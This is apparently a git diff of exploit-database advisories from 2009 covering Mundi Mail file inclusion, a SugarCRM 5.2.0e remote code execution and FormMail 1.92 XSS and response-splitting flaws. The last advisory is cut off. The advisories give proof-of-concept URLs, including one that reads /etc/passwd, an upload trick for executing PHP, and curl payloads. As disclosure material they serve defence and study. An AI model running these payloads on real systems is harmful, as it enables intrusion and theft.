+
+# milw0rm.com [2009-06-15]
diff --git a/platforms/php/webapps/8948.txt b/platforms/php/webapps/8948.txt
index 10b8939f5..a73c56b82 100755
--- a/platforms/php/webapps/8948.txt
+++ b/platforms/php/webapps/8948.txt
@@ -1,50 +1,50 @@
-----------------------------------------------------------------------------------------------------------
-
-
-  Name : Mundi Mail
-  Site : http://sourceforge.net/projects/mundimail/
-
-  Down : http://sourceforge.net/project/showfiles.php?group_id=100875&package_id=108474&release_id=221732
-
-
-----------------------------------------------------------------------------------------------------------
-
-
- 
-  Found By : br0ly
-  Made in  : Brasil
-  Contact  : br0ly[dot]Code[at]gmail[dot]com
-
-
-----------------------------------------------------------------------------------------------------------
-
-
-  Description:
-
-  Bug : Local/Remote File Inclusion
-
- template/simpledefault/admin/_masterlayout.php:10:	include($top);
-
-
-
-
-  If allow_url_fopen=on   --> RFI;
-  If magic_quotes_gpc=off --> LFI;  
-
-
-
-----------------------------------------------------------------------------------------------------------
-
-
-  P0c:
- 
-    LFI:http://localhost/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=/etc/passwd
-
-    RFI:http://localhost/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=[EVIL_CODE]
-
-
-  OBS: need register_globals=on;
-
-----------------------------------------------------------------------------------------------------------
-
-# milw0rm.com [2009-06-15]
+----------------------------------------------------------------------------------------------------------
+
+
+  Name : Mundi Mail
+  Site : http://sourceforge.net/projects/mundimail/
+
+  Down : http://sourceforge.net/project/showfiles.php?group_id=100875&package_id=108474&release_id=221732
+
+
+----------------------------------------------------------------------------------------------------------
+
+
+ 
+  Found By : br0ly
+  Made in  : Brasil
+  Contact  : br0ly[dot]Code[at]gmail[dot]com
+
+
+----------------------------------------------------------------------------------------------------------
+
+
+  Description:
+
+  Bug : Local/Remote File Inclusion
+
+ template/simpledefault/admin/_masterlayout.php:10:	include($top);
+
+
+
+
+  If allow_url_fopen=on   --> RFI;
+  If magic_quotes_gpc=off --> LFI;  
+
+
+
+----------------------------------------------------------------------------------------------------------
+
+
+  P0c:
+ 
+    LFI:http://localhost/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=/etc/passwd
+
+    RFI:http://localhost/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=[EVIL_CODE]
+
+
+  OBS: need register_globals=on;
+
+----------------------------------------------------------------------------------------------------------
+
+# milw0rm.com [2009-06-15]
diff --git a/platforms/php/webapps/8949.txt b/platforms/php/webapps/8949.txt
index 3d98d7dce..3dd93f99f 100755
--- a/platforms/php/webapps/8949.txt
+++ b/platforms/php/webapps/8949.txt
@@ -1,200 +1,200 @@
-SugarCRM 5.2.0e Remote Code Execution
-
- Name              Remote Code Execution in SugarCRM
- Systems Affected  Sugar CRM 5.2.0e and possibly earlier versions
- Severity          High
- Impact (CVSSv2)   High 8/10, vector: (AV:N/AC:L/Au:S/C:P/I:C/A:P)
- Vendor            http://www.sugarcrm.com
- Advisory          http://www.ush.it/team/ush/hack-sugarcrm_520e/adv.txt
- Authors           Antonio "s4tan" Parata (s4tan AT ush DOT it)
-                   Francesco "ascii" Ongaro (ascii AT ush DOT it)
-                   Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
- Date              20090613
-
-I. BACKGROUND
-
->From the SugarCRM web site: "Sugar Express is designed for individuals
-and small companies. Core CRM features help employees get on the same
-page while more complex functionality is stripped away. Sugar Express is
-ideal for providing a single view of the customer from the initial
-marketing campaign through the sales cycle and on to customer support.
-With Sugar Express, companies have a single system of truth for managing
-customer interactions.".
-
-II. DESCRIPTION
-
-A Remote Code Execution Vulnerability exists in SugarCRM software.
-
-III. ANALYSIS
-
-Summary:
-
-A Remote Code Execution issue has been found in SugarCRM version
-5.2.0e. In order to exploit this vulnerability an account on the system
-is required.
-
-The vulnerability resides in the "Compose Email" section. The software
-permits sending email with attachments (if not disabled by the
-administrator). When the name of the file is specified, a validation
-routine is called:
-
---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
-
-function safeAttachmentName($filename) {
-	global $sugar_config;
-	$badExtension = false;
-	//get position of last "." in file name
-	$file_ext_beg = strrpos($filename, ".");
-	$file_ext = "";
-	//get file extension
-	if($file_ext_beg > 0) {
-		$file_ext = substr($filename, $file_ext_beg + 1);
-	}
-	//check to see if this is a file with extension located in "badext"
-	foreach($sugar_config['upload_badext'] as $badExt) {
-	    if(strtolower($file_ext) == strtolower($badExt)) {
-	        //if found, then append with .txt and break out of lookup
-	        $filename = $filename . ".txt";
-	        $badExtension = true;
-	        break; // no need to look for more
-	    } // if
-	} // foreach
-	return $badExtension;
-}
-
---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
-
-This routine checks if the extension of the filename is blacklisted,
-if so the ".txt" extension is appended to the filename. However there is
-a coding error: the function assumes that the filename (extension
-excluded) is at least one char long, this assumption is derived from the
-statement:
-
---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
-
-if($file_ext_beg > 0)
-
---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
-
-Of course this is a bad assumption, if we set the whole filename to
-".php" than the check is skipped and a void extension is assumed.
-Because void extensions are not in the blacklist, no futher extension
-is added to the filename. After this check a file is created on the
-filesystem in the form "".
-
-Where "id" is an alphanumeric string. With the trick illustrated we are
-able to create a file with ".php" extension. To do this upload a new
-file attachment and set the filename to ".php".
-
-After this the attacker has to find the name of the file that was
-uploaded in the attachment list files. To obtaint the real filename
-look in the HTML response for a string like:
-
---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
-
-
-
---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
-
-The real filename in this case is "6e25aba0-9dc4-2a57-8bae-4a1317b35d47.
-php". Now the attacker has to find the directory where the file resides.
-
-Again searching the HTML page for the attribute "assigned_user_id"
-reveals the needed information:
-
---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
-
-    
-
---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
-
-At this point the attacker has all the informations to invoke the
-uploaded file.
-
-Filename: 6e25aba0-9dc4-2a57-8bae-4a1317b35d47.php
-Assigned user id: abf7c77b-2f71-8071-63ba-4a131068e9a2
-
-To directly request it issue a request to:
-
---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
-
-http://www.example.com/cache/modules/Emails/abf7c77b-2f71-8071-63ba-4a13
-1068e9a2/6e25aba0-9dc4-2a57-8bae-4a1317b35d47.php
-
---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
-
-As final note: if the user is "administrator", "assigned_user_id" is
-always "1".
-
-IV. DETECTION
-
-SugarCRM 5.2.0e and possibly earlier versions are vulnerable.
-
-V. WORKAROUND
-
-Upgrade to latest version 5.2.0f
-
-VI. VENDOR RESPONSE
-
-"We have fixed the issue and will be shipping the patch on June 12th.
-We will be doing a full pass of quality assurance in this area to
-ensure that no other issues crop up around file uploads.
-The fix involves modifying the code that handles uploads for email
-attachments to save the files using just a GUID rather than the original
-file name. This is similar to how uploads are handled else where in the
-application and should prevent the code from being executable on the
-server side."
-
-VII. CVE INFORMATION
-
-No CVE at this time.
-
-VIII. DISCLOSURE TIMELINE
-
-20090519 Bug discovered
-20090528 First vendor contact
-20090528 Vendor Response
-20090530 Vendor Confirm the vulnerability
-20090602 Vendor propose a possible fix and path release
-20090612 Vendor released SugarCRM 5.2.0f (Vulnerability fixed)
-20090613 Advisory released
-
-IX. CREDIT
-
-Antonio "s4tan" Parata, Francesco "ascii" Ongaro and Giovanni
-"evilaliv3" Pellerano are credited with the discovery of this
-vulnerability.
-
-Antonio "s4tan" Parata
-web site: http://www.ush.it/
-mail: s4tan AT ush DOT it
-
-Francesco "ascii" Ongaro
-web site: http://www.ush.it/
-mail: ascii AT ush DOT it
-
-Giovanni "evilaliv3" Pellerano
-web site: http://www.ush.it/, http://www.evilaliv3.org/
-mail: evilaliv3 AT ush DOT it
-
-X. LEGAL NOTICES
-
-Copyright (c) 2009 Francesco "ascii" Ongaro
-
-Permission is granted for the redistribution of this alert
-electronically. It may not be edited in any way without mine express
-written consent. If you wish to reprint the whole or any
-part of this alert in any other medium other than electronically,
-please email me for permission.
-
-Disclaimer: The information in the advisory is believed to be accurate
-at the time of publishing based on currently available information. Use
-of the information constitutes acceptance for use in an AS IS condition.
-There are no warranties with regard to this information. Neither the
-author nor the publisher accepts any liability for any direct, indirect,
-or consequential loss or damage arising from use of, or reliance on,
-this information.
-
-# milw0rm.com [2009-06-15]
+SugarCRM 5.2.0e Remote Code Execution
+
+ Name              Remote Code Execution in SugarCRM
+ Systems Affected  Sugar CRM 5.2.0e and possibly earlier versions
+ Severity          High
+ Impact (CVSSv2)   High 8/10, vector: (AV:N/AC:L/Au:S/C:P/I:C/A:P)
+ Vendor            http://www.sugarcrm.com
+ Advisory          http://www.ush.it/team/ush/hack-sugarcrm_520e/adv.txt
+ Authors           Antonio "s4tan" Parata (s4tan AT ush DOT it)
+                   Francesco "ascii" Ongaro (ascii AT ush DOT it)
+                   Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
+ Date              20090613
+
+I. BACKGROUND
+
+>From the SugarCRM web site: "Sugar Express is designed for individuals
+and small companies. Core CRM features help employees get on the same
+page while more complex functionality is stripped away. Sugar Express is
+ideal for providing a single view of the customer from the initial
+marketing campaign through the sales cycle and on to customer support.
+With Sugar Express, companies have a single system of truth for managing
+customer interactions.".
+
+II. DESCRIPTION
+
+A Remote Code Execution Vulnerability exists in SugarCRM software.
+
+III. ANALYSIS
+
+Summary:
+
+A Remote Code Execution issue has been found in SugarCRM version
+5.2.0e. In order to exploit this vulnerability an account on the system
+is required.
+
+The vulnerability resides in the "Compose Email" section. The software
+permits sending email with attachments (if not disabled by the
+administrator). When the name of the file is specified, a validation
+routine is called:
+
+--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
+
+function safeAttachmentName($filename) {
+	global $sugar_config;
+	$badExtension = false;
+	//get position of last "." in file name
+	$file_ext_beg = strrpos($filename, ".");
+	$file_ext = "";
+	//get file extension
+	if($file_ext_beg > 0) {
+		$file_ext = substr($filename, $file_ext_beg + 1);
+	}
+	//check to see if this is a file with extension located in "badext"
+	foreach($sugar_config['upload_badext'] as $badExt) {
+	    if(strtolower($file_ext) == strtolower($badExt)) {
+	        //if found, then append with .txt and break out of lookup
+	        $filename = $filename . ".txt";
+	        $badExtension = true;
+	        break; // no need to look for more
+	    } // if
+	} // foreach
+	return $badExtension;
+}
+
+--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
+
+This routine checks if the extension of the filename is blacklisted,
+if so the ".txt" extension is appended to the filename. However there is
+a coding error: the function assumes that the filename (extension
+excluded) is at least one char long, this assumption is derived from the
+statement:
+
+--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
+
+if($file_ext_beg > 0)
+
+--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
+
+Of course this is a bad assumption, if we set the whole filename to
+".php" than the check is skipped and a void extension is assumed.
+Because void extensions are not in the blacklist, no futher extension
+is added to the filename. After this check a file is created on the
+filesystem in the form "".
+
+Where "id" is an alphanumeric string. With the trick illustrated we are
+able to create a file with ".php" extension. To do this upload a new
+file attachment and set the filename to ".php".
+
+After this the attacker has to find the name of the file that was
+uploaded in the attachment list files. To obtaint the real filename
+look in the HTML response for a string like:
+
+--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
+
+
+
+--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
+
+The real filename in this case is "6e25aba0-9dc4-2a57-8bae-4a1317b35d47.
+php". Now the attacker has to find the directory where the file resides.
+
+Again searching the HTML page for the attribute "assigned_user_id"
+reveals the needed information:
+
+--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
+
+
+
+--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
+
+At this point the attacker has all the informations to invoke the
+uploaded file.
+
+Filename: 6e25aba0-9dc4-2a57-8bae-4a1317b35d47.php
+Assigned user id: abf7c77b-2f71-8071-63ba-4a131068e9a2
+
+To directly request it issue a request to:
+
+--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
+
+http://www.example.com/cache/modules/Emails/abf7c77b-2f71-8071-63ba-4a13
+1068e9a2/6e25aba0-9dc4-2a57-8bae-4a1317b35d47.php
+
+--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
+
+As final note: if the user is "administrator", "assigned_user_id" is
+always "1".
+
+IV. DETECTION
+
+SugarCRM 5.2.0e and possibly earlier versions are vulnerable.
+
+V. WORKAROUND
+
+Upgrade to latest version 5.2.0f
+
+VI. VENDOR RESPONSE
+
+"We have fixed the issue and will be shipping the patch on June 12th.
+We will be doing a full pass of quality assurance in this area to
+ensure that no other issues crop up around file uploads.
+The fix involves modifying the code that handles uploads for email
+attachments to save the files using just a GUID rather than the original
+file name. This is similar to how uploads are handled else where in the
+application and should prevent the code from being executable on the
+server side."
+
+VII. CVE INFORMATION
+
+No CVE at this time.
+
+VIII. DISCLOSURE TIMELINE
+
+20090519 Bug discovered
+20090528 First vendor contact
+20090528 Vendor Response
+20090530 Vendor Confirm the vulnerability
+20090602 Vendor propose a possible fix and path release
+20090612 Vendor released SugarCRM 5.2.0f (Vulnerability fixed)
+20090613 Advisory released
+
+IX. CREDIT
+
+Antonio "s4tan" Parata, Francesco "ascii" Ongaro and Giovanni
+"evilaliv3" Pellerano are credited with the discovery of this
+vulnerability.
+
+Antonio "s4tan" Parata
+web site: http://www.ush.it/
+mail: s4tan AT ush DOT it
+
+Francesco "ascii" Ongaro
+web site: http://www.ush.it/
+mail: ascii AT ush DOT it
+
+Giovanni "evilaliv3" Pellerano
+web site: http://www.ush.it/, http://www.evilaliv3.org/
+mail: evilaliv3 AT ush DOT it
+
+X. LEGAL NOTICES
+
+Copyright (c) 2009 Francesco "ascii" Ongaro
+
+Permission is granted for the redistribution of this alert
+electronically. It may not be edited in any way without mine express
+written consent. If you wish to reprint the whole or any
+part of this alert in any other medium other than electronically,
+please email me for permission.
+
+Disclaimer: The information in the advisory is believed to be accurate
+at the time of publishing based on currently available information. Use
+of the information constitutes acceptance for use in an AS IS condition.
+There are no warranties with regard to this information. Neither the
+author nor the publisher accepts any liability for any direct, indirect,
+or consequential loss or damage arising from use of, or reliance on,
+this information.
+
+# milw0rm.com [2009-06-15]
diff --git a/platforms/php/webapps/8950.txt b/platforms/php/webapps/8950.txt
index 01233485b..c1deb3151 100755
--- a/platforms/php/webapps/8950.txt
+++ b/platforms/php/webapps/8950.txt
@@ -1,262 +1,262 @@
-FormMail 1.92 Multiple Vulnerabilities
-
- Name              Multiple Vulnerabilities in FormMail
- Systems Affected  FormMail 1.92 and possibly earlier versions
- Severity          Medium
- Impact (CVSSv2)   Medium 4.3/10, vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)
- Vendor            http://www.scriptarchive.com/formmail.html
- Advisory          http://www.ush.it/team/ush/hack-formmail_192/adv.txt
- Authors           Francesco "ascii" Ongaro (ascii AT ush DOT it)
-                   Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
-                   Antonio "s4tan" Parata (s4tan AT ush DOT it)
- Date              20090511
-
-I. BACKGROUND
-
-FormMail is a generic HTML form to e-mail gateway that parses the results
-of any form and sends them to the specified users. This script has many
-formatting and operational options, most of which can be specified within
-each form, meaning you don't need programming knowledge or multiple 
-scripts for multiple forms. This also makes FormMail the perfect 
-system-wide solution for allowing users form-based user feedback 
-capabilities without the risks of allowing freedom of CGI access. There 
-are several downloading options available below and more information on 
-this script can be found in the Readme file. FormMail is quite possibily
-the most used CGI program on the internet, having been downloaded over 
-2,000,000 times since 1997.
-
-II. DESCRIPTION
-
-Multiple Vulnerabilities exist in FormMail software.
-
-III. ANALYSIS
-
-Summary:
-
- A) Prelude to the vulnerabities
- B) Cross Site Scripting
- C) HTTP Response Header Injection
- D) HTTP Response Splitting
-
-A) Prelude to the vulnerabities
- 
-What follows is the code used to validate the user input:
-
-Line 283: $safeConfig array definition.
-
---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
-
-	foreach $field (keys %Config) {
-		$safeConfig{$field} = &clean_html($Config{$field});
-	}
-
---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
-
-Line 518: definition of clean_html function, used to generate the 
-"$safeConfig" array from "$Config".
-
---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
-
-	# This function will convert <, >, & and " to their HTML equivalents.
-	sub clean_html {
-		local $value = $_[0];
-		$value =~ s/\&/\&/g;
-		$value =~ s//\>/g;
-		$value =~ s/"/\"/g;
-		return $value;
-	}
-
---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
-
-These functions are not always applied to the user input and don't
-protect against all the attack vectors (as URI or DOM XSS that can work
-also if encoded), this is why various vulnerabilities exist.
-
-B) Cross Site Scripting vulnerability
-
-Line 293: the "redirect" variable is used to write the location header 
-value. Its value is not filtered so it's possible to perform both
-HTTP Header Injection and an HTTP Response Splitting attacks.
-
-Since Header Injection is one of the most versatile attack vectors we
-could use it (like "downgrade it") to perform a Cross Site Scripting
-attack but it would not represent a different vulnerability.
-
-In this case we are already inside a "Location" response header and it's
-possible to perform an XSS without splitting the response and using the
-standard Apache page for the 302 Found HTTP status.
-
---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
-		
-# If redirect option is used, print the redirectional location header.
-if ($Config{'redirect'}) {
- print "Location: $safeConfig{'redirect'}\n\n";
-}
-
---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
-
-XSS vulnerability example:
-	
-http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&subject=1&redire
-ct=javascript:alert(%27USH%27);
-
-Response:
-
-$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&sub
-ject=1&redirect=javascript:alert(%27USH%27);"
-
---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
-
-HTTP/1.1 302 Found
-Date: Sat, 11 Apr 2009 14:12:11 GMT
-Server: Apache
-Location: javascript:alert('USH');
-Content-Length: 267
-Content-Type: text/html; charset=iso-8859-1
-
-
-302 Found
-
-
    Found
    
-
    The document has moved here.
    
-
    
-
    Apache Server at 127.0.0.1 Port 80
    
-
-
---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
-
-Obiously the XSS is not automatic since browsers don't follow the 
-"javascript:" URI handler in the "Location" header.
-
-A second XSS vulnerability, not based on HTTP tricks, exists: in the 
-following code the the "$return_link" variable is reflected (printed) in
-the page body without any validation:
-
---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
-
-Line 371: the "$return_link" variable is printed in the page body 
-without any validation.
-
---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
-
-# Check for a Return Link and print one if found.                    #
-if ($Config{'return_link_url'} && $Config{'return_link_title'}) {
- print "\n";
-}
-
---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
-
-The vulnerability can be triggered with the following request:
-
-$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&subj
-ect=1&return_link_url=javascript:alert(%27USH%27);&return_link_title=USH"
-
-This XSS is not automatic.
-
-C) HTTP Response Header Injection
-
-An HTTP Response Header Injection vulnerability exists, the following 
-request triggers the vulnerability:
-
-$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&sub
-ject=1&redirect=http://www.example.com%0D%0aSet-Cookie:auth%3DUSH;vuln%3
-DHTTPHeaderInjection;" 
-
-Can be verified with the obvious "javascript:alert(document.cookie)".
-
-D) HTTP Response Splitting
-
-Thanks to the full exploitability of the Header Injection vulnerability
-an HTTP Response Splitting can be performed.
-
-The following request is an example of the attack:
-
-http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&subject=1&redire
-ct=http://www.ush.it%0D%0A%0FContent-Length:%200%0D%0AContent-Type:%20te
-xt/plain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Typ
-e:%20text/plain%0D%0Ahttp://www.ush.it
-
---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
-
-$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&sub
-ject=1&redirect=%0D%0A%0FContent-Length:%200%0D%0AContent-Type:%20text/p
-lain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%2
-0text/plain%0D%0Ahttp://www.ush.it"
-HTTP/1.1 302 Found
-Date: Sun, 12 Apr 2009 23:01:18 GMT
-Server: Apache
-Content-Length: 0
-Location:
-Transfer-Encoding: chunked
-Content-Type: text/plain
-
-HTTP/1.1 200 OK
-Content-Type: text/plain
-http://www.ush.it
-
---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
-
-HTTP Response Splitting can be used to trigger a number of different
-vectors, ranging from automatic Reflected XSS to Browser and Proxy 
-Cache Poisoning.
-
-IV. DETECTION
-
-FormMail 1.92 and possibly earlier versions are vulnerable.
-
-V. WORKAROUND
-
-VI. VENDOR RESPONSE
-
-VII. CVE INFORMATION
-
-No CVE at this time.
-
-VIII. DISCLOSURE TIMELINE
-
-20070501 Bug discovered
-20070531 Initial vendor contact (Thu, 31 May 2007 22:21:39 +0200)
--- No response and the bug sleeped for some time in ascii's mind --
-20090505 Second vendor contact
--- Giving up, will have better results with forced disclosure --
-20090511 Advisory Release
-
-IX. CREDIT
-
-Francesco "ascii" Ongaro, Giovanni "evilaliv3" Pellerano and Antonio 
-"s4tan" Parata are credited with the discovery of this vulnerability.
-
-Francesco "ascii" Ongaro
-web site: http://www.ush.it/
-mail: ascii AT ush DOT it
-
-Giovanni "evilaliv3" Pellerano
-web site: http://www.evilaliv3.org
-mail: giovanni.pellerano AT evilaliv3 DOT org
-
-Antonio "s4tan" Parata
-web site: http://www.ictsc.it/
-mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it
-
-X. LEGAL NOTICES
-
-Copyright (c) 2009 Francesco "ascii" Ongaro
-
-Permission is granted for the redistribution of this alert
-electronically. It may not be edited in any way without mine express
-written consent. If you wish to reprint the whole or any
-part of this alert in any other medium other than electronically,
-please email me for permission.
-
-Disclaimer: The information in the advisory is believed to be accurate
-at the time of publishing based on currently available information. Use
-of the information constitutes acceptance for use in an AS IS condition.
-There are no warranties with regard to this information. Neither the
-author nor the publisher accepts any liability for any direct, indirect,
-or consequential loss or damage arising from use of, or reliance on,
-this information.
-
-# milw0rm.com [2009-06-15]
+FormMail 1.92 Multiple Vulnerabilities
+
+ Name              Multiple Vulnerabilities in FormMail
+ Systems Affected  FormMail 1.92 and possibly earlier versions
+ Severity          Medium
+ Impact (CVSSv2)   Medium 4.3/10, vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)
+ Vendor            http://www.scriptarchive.com/formmail.html
+ Advisory          http://www.ush.it/team/ush/hack-formmail_192/adv.txt
+ Authors           Francesco "ascii" Ongaro (ascii AT ush DOT it)
+                   Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
+                   Antonio "s4tan" Parata (s4tan AT ush DOT it)
+ Date              20090511
+
+I. BACKGROUND
+
+FormMail is a generic HTML form to e-mail gateway that parses the results
+of any form and sends them to the specified users. This script has many
+formatting and operational options, most of which can be specified within
+each form, meaning you don't need programming knowledge or multiple 
+scripts for multiple forms. This also makes FormMail the perfect 
+system-wide solution for allowing users form-based user feedback 
+capabilities without the risks of allowing freedom of CGI access. There 
+are several downloading options available below and more information on 
+this script can be found in the Readme file. FormMail is quite possibily
+the most used CGI program on the internet, having been downloaded over 
+2,000,000 times since 1997.
+
+II. DESCRIPTION
+
+Multiple Vulnerabilities exist in FormMail software.
+
+III. ANALYSIS
+
+Summary:
+
+ A) Prelude to the vulnerabities
+ B) Cross Site Scripting
+ C) HTTP Response Header Injection
+ D) HTTP Response Splitting
+
+A) Prelude to the vulnerabities
+ 
+What follows is the code used to validate the user input:
+
+Line 283: $safeConfig array definition.
+
+--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
+
+	foreach $field (keys %Config) {
+		$safeConfig{$field} = &clean_html($Config{$field});
+	}
+
+--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
+
+Line 518: definition of clean_html function, used to generate the 
+"$safeConfig" array from "$Config".
+
+--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
+
+	# This function will convert <, >, & and " to their HTML equivalents.
+	sub clean_html {
+		local $value = $_[0];
+		$value =~ s/\&/\&/g;
+		$value =~ s//\>/g;
+		$value =~ s/"/\"/g;
+		return $value;
+	}
+
+--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
+
+These functions are not always applied to the user input and don't
+protect against all the attack vectors (as URI or DOM XSS that can work
+also if encoded), this is why various vulnerabilities exist.
+
+B) Cross Site Scripting vulnerability
+
+Line 293: the "redirect" variable is used to write the location header 
+value. Its value is not filtered so it's possible to perform both
+HTTP Header Injection and an HTTP Response Splitting attacks.
+
+Since Header Injection is one of the most versatile attack vectors we
+could use it (like "downgrade it") to perform a Cross Site Scripting
+attack but it would not represent a different vulnerability.
+
+In this case we are already inside a "Location" response header and it's
+possible to perform an XSS without splitting the response and using the
+standard Apache page for the 302 Found HTTP status.
+
+--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
+		
+# If redirect option is used, print the redirectional location header.
+if ($Config{'redirect'}) {
+ print "Location: $safeConfig{'redirect'}\n\n";
+}
+
+--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
+
+XSS vulnerability example:
+	
+http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&subject=1&redire
+ct=javascript:alert(%27USH%27);
+
+Response:
+
+$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&sub
+ject=1&redirect=javascript:alert(%27USH%27);"
+
+--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
+
+HTTP/1.1 302 Found
+Date: Sat, 11 Apr 2009 14:12:11 GMT
+Server: Apache
+Location: javascript:alert('USH');
+Content-Length: 267
+Content-Type: text/html; charset=iso-8859-1
+
+
+302 Found
+
+
    Found
    
+
    The document has moved here.
    
+
    
+
    Apache Server at 127.0.0.1 Port 80
    
+
+
+--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
+
+Obiously the XSS is not automatic since browsers don't follow the 
+"javascript:" URI handler in the "Location" header.
+
+A second XSS vulnerability, not based on HTTP tricks, exists: in the 
+following code the the "$return_link" variable is reflected (printed) in
+the page body without any validation:
+
+--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
+
+Line 371: the "$return_link" variable is printed in the page body 
+without any validation.
+
+--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
+
+# Check for a Return Link and print one if found.                    #
+if ($Config{'return_link_url'} && $Config{'return_link_title'}) {
+ print "\n";
+}
+
+--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
+
+The vulnerability can be triggered with the following request:
+
+$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&subj
+ect=1&return_link_url=javascript:alert(%27USH%27);&return_link_title=USH"
+
